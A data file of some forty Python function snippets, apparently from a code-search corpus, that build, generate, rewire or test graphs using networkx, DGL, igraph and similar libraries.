"def make_ws_graph(num_nodes, clockwise_neighbours, rewiring_prob):\r\n #initialize empty graph\r\n ws_graph = {}\r\n for vertex in range(num_nodes): ws_graph[vertex] = []\r\n #add each vertex to clockwise neighbours\r\n for vertex in range(num_nodes):\r\n for neighbour in range(vertex + 1, vertex + clockwise_neighbours + 1):\r\n neighbour = neighbour % num_nodes\r\n ws_graph[vertex] += [neighbour]\r\n ws_graph[neighbour] += [vertex]\r\n for vertex in range(num_nodes):\r\n for neighbour in ws_graph[vertex]:\r\n if random.random() < rewiring_prob:\r\n ws_graph[vertex].remove(neighbour)\r\n ws_graph[neighbour].remove(vertex)\r\n randNode = random.randint(0, num_nodes-1)\r\n while(vertex == randNode):\r\n randNode = random.randint(0, num_nodes - 1)\r\n ws_graph[vertex] += [randNode]\r\n ws_graph[randNode] += [vertex]\r\n\r\n\r\n return ws_graph\r\n #rewire each edge with probability rewiring_prob\r\n\r\n #consider each vertex\r\n\r\n #consider each neighbour\r\n\r\n #decide whether to rewire and join to a random node\r\n\r\n #update if necessary\r",
"def unique_iso(gs):\n # For speed, instead of using a separate isomorphism-checking\n # function, we use our own helper function ck_iso. This checks\n # isomorphism of 2 graphs, given the graphs and their _degree_verts\n # output.\n def ck_iso(gc, gcdv, hc, hcdv):\n # Compare nbr-degree sequences\n if len(gcdv) != len(hcdv):\n return False\n for k in gcdv:\n if k not in hcdv:\n return False\n if len(gcdv[k]) != len(hcdv[k]):\n return False\n # Now we know that gc, hc have the same order\n\n # Try all permutations of the vertex set of graph g that take\n # each vertex to a vertex whose neighbors have the same degree\n # sequence.\n n = len(gc)\n hcsets = list(map(set, hc))\n for p in _partition_perms(list(gcdv.values()), n):\n for v in range(n):\n if hcsets[p[v]] != set([p[w] for w in gc[v]]):\n # A set comprehension would be nice above\n break\n else:\n return True\n return False\n\n # canons is list of pairs: (gc, gcdv)\n canons = []\n\n for g in gs:\n gdv = _degree_verts(g)\n gvp = list(itertools.chain.from_iterable(\n ( gdv[k] for k in sorted(gdv.keys()) )\n ))\n\n # Make semi-canonical form of g\n gc = [ sorted([gvp.index(w) for w in g[v]]) for v in gvp ]\n gcdv = _degree_verts(gc)\n\n # Check isomorphism w/ each graph in canons\n for hc, hcdv in canons:\n if ck_iso(gc, gcdv, hc, hcdv):\n break\n else:\n canons.append((gc, gcdv))\n yield g",
"def makeValid(Xs, graph, td, seed=None):\n # add direct edges when transition is impossible\n check=probX(Xs, graph, td)\n while check[0] == -np.inf:\n if isinstance(check[1],tuple):\n graph[check[1][0], check[1][1]] = 1\n graph[check[1][1], check[1][0]] = 1\n # i think these 2 lines are no longer necessary\n #elif check[1] == \"prior\":\n # raise ValueError('Starting graph has prior probability of 0.0')\n elif isinstance(check[1],int):\n # when list contains one item and node is unreachable, connect to random node\n nplocal = np.random.RandomState(seed)\n randnode = nplocal.choice(range(len(graph)))\n graph[check[1], randnode] = 1\n graph[randnode, check[1]] = 1\n else:\n raise ValueError('Unexpected error from makeValid()')\n check=probX(Xs, graph, td)\n return graph",
"def build_square_test_graph_with_costs(directed=False):\n if directed:\n graph = DirectedGraph()\n else:\n graph = UndirectedGraph()\n\n graph.new_node()\n graph.new_node()\n graph.new_node()\n graph.new_node()\n graph.new_edge(1, 2, 2)\n graph.new_edge(1, 4, 10)\n graph.new_edge(2, 3, 3)\n graph.new_edge(3, 4, 1)\n\n return graph",
"def iGraphFromTuples(association_tuples):\n \n# #get unique words\n# vocab = set()\n# uppercase_tuples = []\n# for (s,r), stren in association_tuples:\n# uppercase_tuples.append((s.upper(), r.upper(), stren))\n# vocab.update(word_pair)\n \n# vocab = list(vocab) #convert to ordered list\n# \n# \n# graph = Graph(len(vocab), directed=True)\n# graph.vs[\"name\"] = vocab #set vertex names\n# edges, _ = zip(*association_tuples)\n# graph.add_edges(edges)\n #association_tuples = [(s.upper(),r.upper(),stren) for (s,r), stren in association_tuples]\n association_tuples = [(s,r,stren) for (s,r), stren in association_tuples]\n graph = Graph.TupleList(association_tuples, directed=True, weights=True)\n \n graph.vs[\"id\"] = graph.vs[\"name\"]\n \n #add weights\n# for s, r , stren in association_tuples:\n# graph[(s,r)] = stren\n neg_log_proportions = []\n for e in graph.es:\n neg_log_proportions.append(-log10(e[\"weight\"]))\n \n graph.es[\"-log weight\"] = neg_log_proportions\n \n assoc_object = AssociationIGraph()\n assoc_object.graph = graph\n return assoc_object",
"def _build_graphs(self):\n g1 = self._build_graph1()\n g2 = self._build_graph2(g1)\n return g1, g2",
"def make_graph_from_spec(graphtype, args):\n parsed = parse_graph_argument(graphtype, args)\n assert parsed['graphtype'] == graphtype\n return obtain_graph(parsed)",
"def make_random_undirected_graph(num_nodes, probility):\n graph = {}\n edges = 0\n for dummy_node in range(num_nodes):\n if dummy_node not in graph:\n graph[dummy_node] = set()\n for dummy_node_pair in range(num_nodes):\n if dummy_node_pair != dummy_node:\n a = random.random() # a real number [0,1)\n if a < probility:\n print dummy_node, dummy_node_pair\n graph[dummy_node].add(dummy_node_pair)\n if dummy_node_pair not in graph:\n graph[dummy_node_pair] = set([dummy_node])\n else:\n graph[dummy_node_pair].add(dummy_node)\n edges += len(graph[dummy_node])\n print \"number of edges are \", edges/2\n\n return graph",
"def reproduce(spec1, spec2):\n a = [1,0]*(total_params//2)\n random.shuffle(a)\n\n \"\"\"Mutation chance\"\"\"\n for i in range(len(a)):\n if random.random() <= mutation_chance:\n if a[i]==0:\n a[i] = 1\n else:\n a[i] = 0\n \n new_kid = []\n \n for i in range(len(spec1)):\n \n if a[i] == 0:\n new_kid.append(spec1[i])\n else:\n new_kid.append(spec2[i])\n return new_kid",
"def permuteEdgeTypes(self):\n\t\tpermuted_graph = copy.copy(self)\n\t\t# swap about half the edges\n\t\ti = len(self.graph)/2\n\t\twhile i > 0:\n\t\t\t# swap \n\t\t\tsourceA, targetA = random.choice(permuted_graph.graph.keys())\n\t\t\tiTypeA, emA = permuted_graph.graph[(sourceA, targetA)]\n\t\t\tsourceB, targetB = random.choice(permuted_graph.graph.keys())\n\t\t\tiTypeB, emB = permuted_graph.graph[(sourceB, targetB)]\n\t\t\tpermuted_graph.graph[(sourceA, targetA)] = (iTypeB, emB)\n\t\t\tpermuted_graph.graph[(sourceB, targetB)] = (iTypeA, emA)\n\n\t\t\ti -= 1\n\n\t\t# return a new graph object\t\t\n\t\treturn permuted_graph",
"def create_random_graph(no_vertices, no_edges):\r\n if no_vertices < 0 or no_edges < 0:\r\n raise GraphException(\"Error! The number of edges and number of vertices must be non-negative.\")\r\n if no_edges > no_vertices * (no_vertices - 1):\r\n raise GraphException(\"Error! Too many edges given.\")\r\n random_graph = UndirectedGraph(no_vertices)\r\n while no_edges:\r\n _from = random.randrange(0, no_vertices)\r\n _to = random.randrange(0, no_vertices)\r\n cost = random.randrange(0, MAX_GRAPH_COST + 1) # The costs will be in [0, MAX_COST]\r\n if not random_graph.is_edge_in_graph(_from, _to):\r\n random_graph.add_edge(_from, _to, cost)\r\n no_edges = no_edges - 1\r\n return random_graph",
"def test_choose_end_not_random_vertex_graph(self):\n self.assertEquals(\n Dijkstras().dijkstras(self.g2, 'a', 'b'), (2, ['a', 'b']))",
"def get_graph_func(name):\n if name == \"chain\":\n f = generate_chain\n elif name == \"bidiag\":\n f = generate_bidiag\n elif name == \"collider\":\n f = generate_collider\n elif name == \"jungle\":\n f = generate_jungle\n elif name == \"full\":\n f = generate_full\n elif name == \"regular\":\n f = generate_regular_graph\n elif name == \"random\":\n f = generate_random_graph\n elif name.startswith(\"random_max_\"): # Random graph with maximum number of parents\n max_parents = int(name.split(\"_\")[-1])\n f = lambda *args, **kwargs: generate_random_graph(*args, max_parents=max_parents, **kwargs)\n else:\n f = generate_random_graph\n return f",
"def test_initialization_of_graphs():\n g = UndirectedGraph([('A', 2), (2, 'B'), ('B', 'C')])\n h = UndirectedGraph([('A', 2), ('B', 'C'), (2, 'B')])\n assert g == h\n \n # Raises ValueError since there are too few weights\n with pytest.raises(ValueError):\n g = UndirectedGraph([('A', 2), (2, 'B'), ('B', 'C')], [1, 2])\n \n g = UndirectedGraph([('A', 2), ('B', 'C'), ('B', 'C')], [1, 2, 2])\n assert g.weight(('B', 'C')) == 2",
"def rand_flip_graph(graph, edge):\n return rand_zero_or_one(0.5)\n # return rand_zero_or_one(edge_prob(graph, edge))",
"def __generate_graph(self, graph_type, graph_content):\n\n gv_format = str(self.__arg_options['format'])\n gv_type = str(graph_type)\n gv_location = str(self.__config_content['location'])\n gv_content = dict(graph_content)\n\n try:\n graph = GraphGenerator()\n graph.set_graph_config(gv_format, gv_location)\n graph.generate_graph(gv_content, gv_type)\n except (TypeError, ValueError) as error:\n self.__LOGGER.error(error)",
"def generate_problem(self, config: Config, iter_count: int) -> networkx.Graph:\n\n if config is None:\n config = {\"nodes\": 5}\n\n nodes = config['nodes']\n\n # Read in the original graph\n graph = nx.read_gpickle(os.path.join(os.path.dirname(__file__), \"reference_graph.gpickle\"))\n\n # Remove seams until the target number of seams is reached\n # Get number of seam in graph\n nodes_in_graph = [x for x in graph.nodes]\n nodes_in_graph.sort()\n\n if len(nodes_in_graph) < nodes:\n raise ValueError(f\"Too many nodes! The original graph has less seams than that!\")\n\n unwanted_nodes = nodes_in_graph[-len(nodes_in_graph) + nodes:]\n unwanted_nodes = [x for x in graph.nodes if x in unwanted_nodes]\n # Remove one node after another\n for node in unwanted_nodes:\n graph.remove_node(node)\n\n if not nx.is_connected(graph):\n logging.error(\"Graph is not connected!\")\n raise ValueError(f\"Graph is not connected!\")\n\n # normalize graph\n cost_matrix = self._get_tsp_matrix(graph)\n graph = nx.from_numpy_array(cost_matrix)\n\n self.application = graph\n return graph",
"def test_graph_factory_with_ambiguous_edges(\n gdcmodels: FakeModels,\n gdcdictionary: models.FakeDictionary,\n src_id: str,\n dst_id: str,\n edge_label: str,\n circle_1_to_2: str,\n circle_2_to_1: str,\n) -> None:\n gf = GraphFactory(gdcmodels, gdcdictionary)\n\n nodes = [\n {\"label\": \"circle_1\", \"node_id\": UUID1},\n {\"label\": \"circle_2\", \"node_id\": UUID2},\n ]\n\n edges = [\n {\"src\": src_id, \"dst\": dst_id, \"label\": edge_label},\n ]\n\n created_nodes = gf.create_from_nodes_and_edges(nodes=nodes, edges=edges, unique_key=\"node_id\")\n\n assert len(created_nodes) == 2\n\n circle_1s = [n for n in created_nodes if n.label == \"circle_1\"]\n assert len(circle_1s) == 1\n circle_1 = circle_1s[0]\n circle_1_to_2_assic = getattr(circle_1, circle_1_to_2)\n assert len(circle_1_to_2_assic) == 1\n circle_2s = [n for n in created_nodes if n.label == \"circle_2\"]\n assert len(circle_2s) == 1\n circle_2 = circle_2s[0]\n circle_2_to_1_assoc = getattr(circle_2, circle_2_to_1)\n assert len(circle_2_to_1_assoc) == 1\n assert circle_1_to_2_assic[0] == circle_2\n assert circle_2_to_1_assoc[0] == circle_1\n\n assert len(circle_1.edges_out + circle_1.edges_in) == 1\n assert len(circle_2.edges_out + circle_2.edges_in) == 1",
"def generate_computational_graph(RHS, schema):\n computational_graph=dict()\n for level in range(3):\n #use brute force to generate candidates for each level\n computational_graph[level]=[]\n if level== 0:\n for attribute in schema:\n if attribute !=RHS:\n computational_graph[level].append(set([attribute]))\n\n else:\n for element1 in computational_graph[level-1]:\n for element2 in computational_graph[0]:\n newelement = element1.union(element2)\n if newelement not in computational_graph[level]:\n if len(newelement)==level+1:\n computational_graph[level].append(newelement)\n\n return computational_graph",
"def generate(\n self,\n num_nodes_src_set: int,\n num_nodes_dst_set: int,\n num_edges_src_dst: int,\n num_edges_dst_src: int,\n is_directed: bool,\n return_node_ids: bool = False,\n transform_graph: bool = True,\n *args,\n **kwargs,\n ):\n raise NotImplementedError()",
"def create_graph(id):\n\n\timport numpy as np\n\timport networkx as nx\n\n\t# seed the rng\n\tseed = id\n\n\t# set base number of nodes and minimum number of edges\n\tn = 50\n\te = 100\n\n\t# randomise number of nodes\n\tpm1 = (-1)**(seed % 2)\n\tseed = rng(seed)\n\tn += pm1*(seed % 11)\n\tseed = rng(seed)\n\n\t# randomise minimum number of edges\n\tpm2 = (-1)**(seed % 2)\n\tseed = rng(seed)\n\te = 2*n + pm2*(seed % 11)\n\tseed = rng(seed)\n\n\t# initialise empty graph\n\tG = nx.convert_node_labels_to_integers(nx.empty_graph(n))\n\n\t# add e random edges before checking connectedness\n\twhile G.number_of_edges() < e:\n\t\tnode1 = seed % n\n\t\tseed = rng(seed)\n\t\tnode2 = seed % n\n\t\tseed = rng(seed)\n\t\tif node1 != node2:\n\t\t\tif node2 > node1:\n\t\t\t\tnode1, node2 = node2, node1\n\t\t\tG.add_edge(node1, node2)\n\n\t# if G is disconnected, find connected components and add edges\n\tif not nx.is_connected(G):\n\t\tcc = sorted(list(nx.connected_components(G)))\n\t\tlargest = cc[0]\n\t\tfor i in range(len(cc)):\n\t\t\tif len(cc[i]) > len(largest):\n\t\t\t\tlargest = cc[i]\t\t\n\t\tfor component in cc:\n\t\t\tif component != largest:\n\t\t\t\tnode1 = list(component)[seed % len(component)]\n\t\t\t\tseed = rng(seed)\n\t\t\t\tnode2 = list(largest)[seed % len(largest)]\n\t\t\t\tseed = rng(seed)\n\t\t\t\tif node2 > node1:\n\t\t\t\t\tnode1, node2 = node2, node1\n\t\t\t\tG.add_edge(node1, node2)\n\n\t# if for some reason G is still disconnected, print a helpful error message\n\tif nx.is_connected(G):\n\t\treturn G\n\telse:\n\t\tprint(\"Sorry, failed to produce a connected graph :( Please contact one of your lecturers.\")",
"def generation_next(prev_gen):\n next_gen = []\n\n # Iter through list of graphs\n for original_graph in prev_gen:\n # Select edges to nodes which are at distance 2\n select_edges = dist2_nodepairs(original_graph)\n\n # Go through the list of possible selected edges and add one\n for test_edge in select_edges:\n test_graph = original_graph.copy()\n test_graph.add_edge(*test_edge)\n if (not graph_exists(test_graph, next_gen)) \\\n and check_test_graph(test_graph):\n next_gen.append(test_graph)\n\n return next_gen",
"def randnet(G):\n\t\n\t#initializationo of the lists\n\telst = G.get_edgelist()\n\tclst = G.es['color'][:]\n\tcdic = {}\n\tfor i,c in enumerate(clst):\n\t\tcdic[c]=i\n\tlst1 = [[]]*len(key)\n\tfor i,e in enumerate(elst):\n\t\tlst1[cdic[clst[i]]].append([e[0],e[1]])\n\t\t\n\t#randomization procedure\n\tfor i in range(random.randrange(100,200)):\n\t\tcid = cdic[random.choice(clst)] #random choice weighted by the frequency of each color\n\t\te1id = random.randrange(0,len(lst1[cid])) #random choice of edge with that color\n\t\te2id = random.randrange(0,len(lst1[cid]))\n\t\textop = random.randrange(0,2)#random choice of top/bottom\n\t\tttemp = lst1[cid][e1id][extop]\n\t\tlst1[cid][e1id][extop] = lst1[cid][e2id][extop]\n\t\tlst1[cid][e2id][extop] = ttemp\n\t\n\tcoutlst = []\n\teoutlst\t= []\n\tfor i in range(len(lst1)):\n\t\tc = clst[i]\n\t\tfor e in lst1[i]:\n\t\t\tcoutlst.append(c)\n\t\t\teoutlst.append((e[0],e[1]))\n\n\treturn [eoutlst,coutlst]",
"def GGPgraphrnd(alpha, sigma, tau):\n # `epsilon` truncated sampling\n epsilon = 1e-6\n W = ggprnd(alpha, sigma, tau, trc=epsilon)\n\n W_star = sum(W)\n D_star = poisson(W_star**2).rvs()\n\n U = W_star * uniform().rvs((D_star, 2))\n \n W_interval = np.concatenate([np.array([0.]), W.cumsum()])\n\n interval_ranks = histc(U.flatten(), W_interval)\n selected_atom = np.array([False] * len(W))\n selected_atom[np.unique(interval_ranks)] = True\n w_rem = sum(W[~selected_atom])\n w = sum(W[selected_atom])\n\n # D: directed multi-graph\n hash_table = {key: value for key, value in zip(np.unique(interval_ranks), range(len(np.unique(interval_ranks))))}\n indexer = lambda x: hash_table[x]\n indexer = np.vectorize(indexer)\n D = interval_ranks.reshape(D_star, 2)\n D = coo_matrix((np.ones(D_star), (indexer(D[:, 0]), indexer(D[:, 1]))), \n shape=(sum(selected_atom), sum(selected_atom)))\n Z = (D + D.T).astype(bool)\n\n return coo_matrix(Z), w, w_rem",
"def test_graph2():\n mol_graph1 = DGLGraph([(0, 1), (0, 2), (1, 2)])\n mol_graph2 = DGLGraph([(0, 1), (1, 2), (1, 3), (1, 4)])\n batch_mol_graph = dgl.batch([mol_graph1, mol_graph2])\n node_feats = torch.arange(batch_mol_graph.number_of_nodes()).float().reshape(-1, 1)\n edge_feats = torch.arange(2 * batch_mol_graph.number_of_edges()).float().reshape(-1, 2)\n\n complete_graph1 = get_complete_graph(mol_graph1.number_of_nodes())\n complete_graph2 = get_complete_graph(mol_graph2.number_of_nodes())\n batch_complete_graph = dgl.batch([complete_graph1, complete_graph2])\n atom_pair_feats = torch.arange(batch_complete_graph.number_of_edges()).float().reshape(-1, 1)\n\n return batch_mol_graph, node_feats, edge_feats, batch_complete_graph, atom_pair_feats",
"def fix_graph(self,graph):\n graph_compleate_reachable = False\n while not graph_compleate_reachable:\n not_reachable_in ,not_reachable_out = self.not_reachable(graph)\n for n in not_reachable_in:\n graph.add_edge(self.random.randint(0,n-1),n)\n for n in not_reachable_out:\n graph.add_edge(n,self.random.randint(n+1, self.nodes-1))\n graph_compleate_reachable = len(not_reachable_in)==0 and len(not_reachable_out)==0\n return graph",
"def topology_random_reconnect(self, probability):\n\t\tfor i in range(len(self.sites)):\n\t\t\tfor j in range(len(self.sites)):\n\t\t\t\tif (i != j) and (self.sites[j] in self.sites[i].neighbors):\n\t\t\t\t\tif numpy.random.rand() < probability / 2.0:\n\t\t\t\t\t\tchoice_list = [s for s in self.sites if not (s in self.sites[i].neighbors)]\n\t\t\t\t\t\tif len(choice_list) > 0:\n\t\t\t\t\t\t\tchoosed = numpy.random.choice(choice_list)\n\t\t\t\t\t\t\tself.sites[i].neighbors.remove(self.sites[j])\n\t\t\t\t\t\t\tself.sites[j].neighbors.remove(self.sites[i])\n\t\t\t\t\t\t\tself.sites[i].neighbors.append(choosed)\n\t\t\t\t\t\t\tchoosed.neighbors.append(self.sites[i])",
"def generate_disjoint_omega(omega, num_columns):\n dis_omega = []\n while len(dis_omega) != num_columns:\n lit_set = generate_random_literals(len(omega[1]), 0, 2)\n if check_disjunction(omega, lit_set):\n dis_omega.append(lit_set)\n\n return dis_omega",
"def generate(self):\n\n g = nx.Graph()\n g.add_nodes_from(self.graph.nodes)\n\n num_nodes = g.number_of_nodes()\n\n degree_sequence = sorted([d for n, d in self.graph.degree()])\n degree_count = Counter(degree_sequence)\n deg, cnt = zip(*degree_count.items())\n\n degree_probs = [c / sum(cnt) for c in cnt]\n\n for i in range(num_nodes):\n num_edges = np.random.choice(a=deg, p=degree_probs) - g.degree[i]\n\n if num_edges > 0:\n ranking = self.ranker.get_ranking(i)\n probs = get_rank_probabilities(len(ranking))\n target_nodes = np.random.choice(a=ranking, p=probs, size=num_edges, replace=False)\n\n for j in target_nodes:\n g.add_edge(i, j)\n\n return g",
"def random_graph(n, m):\n G = Graph()\n for v in range(n):\n G.add_vertex(v)\n \n while G.num_edges() < m:\n G.add_edge(random.sample(range(n), 2))\n\n return G",
"def test_graph_directed():\n topo = complete_topology(5)\n assert isinstance(topo.get_graph(), networkx.DiGraph)\n # even if original graph is undirected\n topo = Topology(u'noname', networkx.star_graph(8))\n assert topo.get_graph().is_directed()",
"def build_topology_regular(config):\n\n size = config['RegularTopology']['size']\n degree = config['RegularTopology']['degree']\n seed = config['Simulation']['seed']\n\n assert size > 0\n assert degree >= 0\n\n top = nx.random_regular_graph(d=degree, n=size, seed=seed)\n top.name = 'Random Regular Graph: {n} nodes, {d} degree, {s} seed'.format(n=size, d=degree, s=seed)\n return top",
"def create_model(opts):\n # G = DCGenerator(noise_size=opts.noise_size, conv_dim=opts.conv_dim)\n # D = DCDiscriminator(conv_dim=opts.conv_dim)\n G = DCGenerator()\n D = DCDiscriminator()\n\n return G, D",
"def make_random_graph(num_nodes, prob):\n #initialize empty graph\n random_graph = {}\n #consider each vertex\n for i in range(num_nodes):\n random_graph[i] = []\n\n for vertex in range(num_nodes):\n for neighbour in range(vertex+1, num_nodes):\n random_number = random.random()\n if random_number < prob:\n random_graph[vertex] += [neighbour]\n random_graph[neighbour] += [vertex] \n #add vertex with list of out_ neighbours\n\n return random_graph",
"def __init__(self, graph: ghidra.graph.GImplicitDirectedGraph, maxDistance: float, metric: ghidra.graph.GEdgeWeightMetric):\n ...",
"def initRandomGraph(ctor,n,m):\n\tg=ctor(n)\n\taddedEdges=0\n\twhile addedEdges < m:\n\t\tx=random.randrange(0,n)\n\t\ty=random.randrange(0,n)\n\t\tif not g.isEdge(x,y):\n\t\t\tg.addEdge(x,y)\n\t\t\taddedEdges+=1\n\treturn g",
"def create_reaction_graph(\n reactants_graph: dgl.DGLGraph,\n products_graph: dgl.DGLGraph,\n num_unchanged_bonds: int,\n num_lost_bonds: int,\n num_added_bonds: int,\n num_global_nodes: int = 0,\n) -> dgl.DGLGraph:\n\n # First add unchanged bonds and lost bonds from reactants\n rel = (\"atom\", \"bond\", \"atom\")\n src, dst = reactants_graph.edges(order=\"eid\", etype=rel)\n a2a = [(u, v) for u, v in zip(src, dst)]\n\n # Then add added bonds from products\n src, dst, eid = products_graph.edges(form=\"all\", order=\"eid\", etype=rel)\n for u, v, e in zip(src, dst, eid):\n # e // 2 because two edges for each bond\n if e // 2 >= num_unchanged_bonds:\n a2a.append((u, v))\n\n num_atoms = reactants_graph.num_nodes(\"atom\")\n edges_dict = {(\"atom\", \"bond\", \"atom\"): a2a}\n num_nodes_dict = {\"atom\": num_atoms}\n\n # global nodes\n if num_global_nodes > 0:\n a2v = []\n v2a = []\n for a in range(num_atoms):\n for v in range(num_global_nodes):\n a2v.append([a, v])\n v2a.append([v, a])\n\n edges_dict[(\"atom\", \"a2g\", \"global\")] = a2v\n edges_dict[(\"global\", \"g2a\", \"atom\")] = v2a\n num_nodes_dict[\"global\"] = num_global_nodes\n\n g = dgl.heterograph(edges_dict, num_nodes_dict=num_nodes_dict)\n\n return g",
"def __init__(self, graph: ghidra.graph.GImplicitDirectedGraph, metric: ghidra.graph.GEdgeWeightMetric):\n ...",
"def test_small_square_cyclical_graph(self):\n distance, path = Dijkstras().dijkstras(self.g4, 'a', 'b')\n self.assertEquals(distance, 2)\n self.assertTrue(path == ['a', 'c', 'b'] or path == ['a', 'd', 'b'],\n 'path was {} instead of {} or {}'.format(\n path,\n ['a', 'c', 'b'],\n ['a', 'd', 'b']))",
"def create_model(opts):\n G_XtoY = CycleGenerator(conv_dim=opts.g_conv_dim, init_zero_weights=opts.init_zero_weights)\n G_YtoX = CycleGenerator(conv_dim=opts.g_conv_dim, init_zero_weights=opts.init_zero_weights)\n D_X = DCDiscriminator(conv_dim=opts.d_conv_dim)\n D_Y = DCDiscriminator(conv_dim=opts.d_conv_dim)\n\n return G_XtoY, G_YtoX, D_X, D_Y",
"def test_get_generating_consuming(self):\n g0_graph = tf.Graph()\n with g0_graph.as_default():\n a0_tensor = tf.constant(1, name=\"a0\")\n b0_tensor = tf.constant(2, name=\"b0\")\n tf.add(a0_tensor, b0_tensor, name=\"c0\")\n g0 = gde.Graph(g0_graph)\n a0 = g0[\"a0\"].output(0)\n b0 = g0[\"b0\"].output(0)\n c0 = g0[\"c0\"].output(0)\n\n self.assertEqual(len(gde.util.get_generating_ops([a0, b0])), 2)\n self.assertEqual(len(gde.util.get_consuming_ops([a0, b0])), 1)\n self.assertEqual(len(gde.util.get_generating_ops([c0])), 1)\n self.assertEqual(gde.util.get_consuming_ops([c0]), [])",
"def random_sample(G):\n E = collections.defaultdict(list) # to store the new sampled preference list\n for student in G.A:\n pref_list = G.E[student]\n E[student] = pref_list[:] # store the pref list of student in E\n for elective in pref_list:\n E[elective].append(student)\n\n for elective in G.B:\n random.shuffle(G.E[elective])\n return graph.BipartiteGraph(G.A, G.B, E, G.capacities)",
"def graph_create(host, host_path):\n graphs = list()\n for name in dash_profile['graphs']:\n log.info(\" Graph: %s\" % name)\n graph = list()\n # Skip undefined graphs\n if name not in graphdef.keys():\n log.error(\"%s not found in graphdef.yml\" % name)\n continue\n # Graph Type #1: Host Metrics\n # Identified by filesytem globbing\n elif 'glob_verify' in graphdef[name].keys():\n # Determine and test metric paths\n if 'glob_metrics' in graphdef[name].keys():\n glob_metrics = graphdef[name]['glob_metrics']\n metric_verify = True\n else:\n glob_metrics = graphdef[name]['glob_verify']\n metric_verify = False\n metric_glob = \"%s/%s\" % (host_path, glob_metrics)\n metric_paths = glob.glob(metric_glob)\n if len(metric_paths) <= 0:\n continue\n metric_paths.sort()\n for metric_path in metric_paths:\n graph_object = dict(graphdef[name])\n # Verify metric path\n if metric_verify:\n verify_glob = \"%s/%s\" % (metric_path,\n graphdef[name]['glob_verify'])\n del(graph_object['glob_metrics'])\n else:\n verify_glob = metric_path\n if len(glob.glob(verify_glob)) != 1:\n continue\n del(graph_object['glob_verify'])\n metric = os.path.basename(metric_path)\n log.debug(\" metric: %s\" % metric)\n graph = graph_compile(host, name, graph_object, metric)\n if len(graph) > 0:\n graphs.append(graph)\n # Graph Type #2: Carbon Match\n # Metrics reported directly by carbon server to itself\n elif ('carbon_match' in graphdef[name].keys() and\n graphdef[name]['carbon_match'] and\n host == dashconf['carbon_match']):\n graph_object = dict(graphdef[name])\n del graph_object['carbon_match']\n graph = graph_compile(dashconf['carbon_server'], name,\n graph_object, None)\n if len(graph) > 0:\n graphs.append(graph)\n return graphs",
"def set_random_gn_graph(self, num_nodes, num_edges=None, degree_s=[None, None]):\n # remove the current graph first\n self.clear()\n\n if num_edges is None:\n num_edges = int((num_nodes ** 2 / 4))\n #\n # first create a GN graph\n\n #G = nx.gn_graph(num_nodes)\n G = nx.gn_graph(num_nodes)\n H = nx.DiGraph()\n for u, v in G.edges():\n H.add_edge(v, u, weight=1)\n G = H\n for u, v in G.edges():\n G[u][v]['weight'] = 1\n\n nodes = nx.topological_sort(G)\n num_edges = num_edges - G.number_of_edges()\n for i in range(num_edges):\n u_idx = random.choice(range(len(nodes)-1))\n u = nodes[u_idx]\n v = random.choice(nodes[u_idx+1:])\n if (u,v) in G.edges():\n G[u][v]['weight'] += 1\n else:\n G.add_edge(u, v, weight=1)\n\n self.set_random_session(G, degree_s)",
"def random_graph(N, deg_sampler, directed=True,\n parallel_edges=False, self_loops=False, block_membership=None,\n block_type=\"int\", degree_block=False,\n random=True, verbose=False, **kwargs):\n\n g = Graph()\n\n if (type(block_membership) is types.FunctionType or\n type(block_membership) is types.LambdaType):\n btype = block_type\n bm = []\n if len(inspect.getargspec(block_membership)[0]) == 0:\n for i in range(N):\n bm.append(block_membership())\n else:\n for i in range(N):\n bm.append(block_membership(i))\n block_membership = bm\n elif block_membership is not None:\n btype = _gt_type(block_membership[0])\n\n if len(inspect.getargspec(deg_sampler)[0]) > 0:\n if block_membership is not None:\n sampler = lambda i: deg_sampler(i, block_membership[i])\n else:\n sampler = deg_sampler\n else:\n sampler = lambda i: deg_sampler()\n\n libgraph_tool_generation.gen_graph(g._Graph__graph, N, sampler,\n not parallel_edges,\n not self_loops, not directed,\n _get_rng(), verbose, True)\n g.set_directed(directed)\n\n if degree_block:\n if btype in [\"object\", \"string\"] or \"vector\" in btype:\n btype = \"object\"\n elif btype in [\"int\", \"int32_t\", \"bool\"]:\n btype = \"vector<int32_t>\"\n elif btype in [\"long\", \"int64_t\"]:\n btype = \"vector<int64_t>\"\n elif btype in [\"double\"]:\n btype = \"vector<double>\"\n elif btype in [\"long double\"]:\n btype = \"vector<long double>\"\n\n if block_membership is not None:\n bm = g.new_vertex_property(btype)\n if btype in [\"object\", \"string\"] or \"vector\" in btype:\n for v in g.vertices():\n if not degree_block:\n bm[v] = block_membership[int(v)]\n else:\n if g.is_directed():\n bm[v] = (block_membership[int(v)], v.in_degree(),\n v.out_degree())\n else:\n bm[v] = (block_membership[int(v)], v.out_degree())\n else:\n try:\n bm.a = block_membership\n except ValueError:\n bm = g.new_vertex_property(\"object\")\n for v in g.vertices():\n bm[v] = block_membership[int(v)]\n else:\n bm = None\n\n if random:\n g.set_fast_edge_removal(True)\n random_rewire(g, parallel_edges=parallel_edges,\n self_loops=self_loops, verbose=verbose,\n block_membership=bm, **kwargs)\n g.set_fast_edge_removal(False)\n\n if bm is None:\n return g\n else:\n return g, bm",
"def set_random_dag(self, num_nodes, num_edges=None, degree_s=[None, None]):\n # first create a DAG with num_nodes number of nodes by randomly pack\n # adjacency matrix which is lower triangular\n # this may not be the best way\n # how to generate MultiDigraph?\n if num_edges is None:\n num_edges = int((num_nodes ** 2 / 4))\n\n while True:\n adj_matrix = np.zeros((num_nodes, num_nodes))\n\n positions = []\n for i in range(num_nodes):\n for j in range(i+1, num_nodes):\n positions.append((i,j))\n\n # create random edges\n rand_idx = [random.randint(0, len(positions)-1) for x in range(num_edges)]\n for i in rand_idx:\n a, b = positions[i]\n adj_matrix[a][b] += 1\n\n # Done with adjacency matrix\n G = nx.from_numpy_matrix(adj_matrix, create_using=nx.DiGraph())\n\n if nx.is_connected(nx.Graph(G)):\n break\n\n self.set_random_session(G, degree_s)",
